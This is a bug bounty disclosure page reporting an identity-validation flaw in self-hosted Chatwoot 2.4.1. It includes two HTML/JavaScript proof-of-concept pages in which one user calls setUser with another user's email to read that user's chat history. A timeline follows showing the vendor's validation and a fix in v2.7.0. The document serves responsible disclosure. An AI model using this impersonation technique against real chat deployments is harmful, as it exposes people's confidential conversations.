We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Remote access to another's conversation based on their email address in chatwoot/chatwoot

Valid

Reported on

Apr 22nd 2022

System:

  • Chatwoot 2.4.1, self-hosted
  • User identity validation is enabled
  • Each client has a unique identifier and a corresponding valid hmac

Description

User B can impersonate User A and access his chat history by filling in user A's email address in the setUser despite that the two users do not share the same unique ID nor the same HMAC.

I can reproduce and I've made a screencast.

Proof of Concept

IN USER A BROWSER:

<html> <head> <script> // CHATWOOT INITIALISATION var t = "script"; var d = document; var g = d.createElement(t), s = d.getElementsByTagName(t)[0]; g.src = "https://chatbot.helmo.be/packs/js/sdk.js"; g.defer = true; g.async = true; s.parentNode.insertBefore(g, s); g.onload = function () { window.chatwootSDK.run({ websiteToken: "xnsdyXjCDy5nWb9L1xTKXERX", baseUrl: "https://chatbot.helmo.be" }); };

        // USER INITIALISATION
        window.addEventListener('chatwoot:ready', function () {
            // CHATWOOT USER'S CONFIGURATION
            var userConfig = {
                // USER-B UNIQUE IDENTIFIER -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                tokenPublicUtilisateur: "B3E5BD88D0FE9E92CD04DA7EF5A449FDD1C807DE495E659F56FA400AD02613C1",

                // USER-B VALID HMAC BASED ON USER UNIQUE IDENTIFIER AND CHATWOOT PRIVATE KEY -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                hmacUtilisateur: "0a7331f5482b26cf6e74aa4294e6890b5eb9593ec71f9edad8cf9f24f9704fa5",

                // USER-A AND USER-B EMAIL
                // USER-B CLAMIS TO HAVE USER-A E-MAIL ADDRESS
                email: "test-user-a@gmail.com",
            };

            console.log("user identifier: " + userConfig.tokenPublicUtilisateur);
            console.log("user hmac: " + userConfig.hmacUtilisateur);
            console.log("user email: " + userConfig.email);

            // USER-A INITIALISATION
            window.$chatwoot.setUser(userConfig.tokenPublicUtilisateur, {
                identifier_hash: userConfig.hmacUtilisateur,
                name: null,
                email: userConfig.email,
                phone_number: null
            });
        });
    </script>
</head>

</html>

IN USER B BROWSER:

<html> <head> <script> // CHATWOOT INITIALISATION var t = "script"; var d = document; var g = d.createElement(t), s = d.getElementsByTagName(t)[0]; g.src = "https://chatbot.helmo.be/packs/js/sdk.js"; g.defer = true; g.async = true; s.parentNode.insertBefore(g, s); g.onload = function () { window.chatwootSDK.run({ websiteToken: "xnsdyXjCDy5nWb9L1xTKXERX", baseUrl: "https://chatbot.helmo.be" }); };

        // USER INITIALISATION
        window.addEventListener('chatwoot:ready', function () {
            // CHATWOOT USER'S CONFIGURATION
            var userConfig = {
                // USER-B UNIQUE IDENTIFIER -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                tokenPublicUtilisateur: "72907A68EC50F17ABD2D1E09EDDCA7102C9679C9E40B612E306DC8C2AA6BD054",

                // USER-B VALID HMAC BASED ON USER UNIQUE IDENTIFIER AND CHATWOOT PRIVATE KEY -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                hmacUtilisateur: "da1e4d7464a01209b7e6c00977e095868b014f7248d678c0dfcf38e5e749eb2f",

                // USER-A AND USER-B EMAIL
                // USER-B CLAMIS TO HAVE USER-A E-MAIL ADDRESS
                email: "test-user-a@gmail.com",
            };

            console.log("user identifier: " + userConfig.tokenPublicUtilisateur);
            console.log("user hmac: " + userConfig.hmacUtilisateur);
            console.log("user email: " + userConfig.email);

            // USER-B INITIALISATION
            window.$chatwoot.setUser(userConfig.tokenPublicUtilisateur, {
                identifier_hash: userConfig.hmacUtilisateur,
                name: null,
                email: userConfig.email,
                phone_number: null
            });
        });
    </script>
</head>

</html>

Impact

Access confidential conversation and impersonating someone

We are processing your report and will contact the chatwoot team within 24 hours. a year ago
We have contacted a member of the chatwoot team and are waiting to hear back a year ago
We have sent a follow up to the chatwoot team. We will try again in 7 days. a year ago
We have sent a second follow up to the chatwoot team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the chatwoot team. This report is now considered stale. a year ago
Sojan Jose validated this vulnerability a year ago

thanks a lot for the report. We were able to replicate this on our end.

Nicolas M. has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the chatwoot team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the chatwoot team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the chatwoot team. This report is now considered stale. a year ago
Sojan Jose marked this as fixed in v2.7.0 with commit f71980 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation